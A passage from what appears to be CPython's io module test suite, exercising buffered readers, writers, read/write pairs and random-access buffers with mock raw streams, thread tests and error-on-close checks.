self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def test_flush_error_on_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
def bad_flush():
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
pass
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
@unittest.skip('test having existential crisis')
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_flush_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
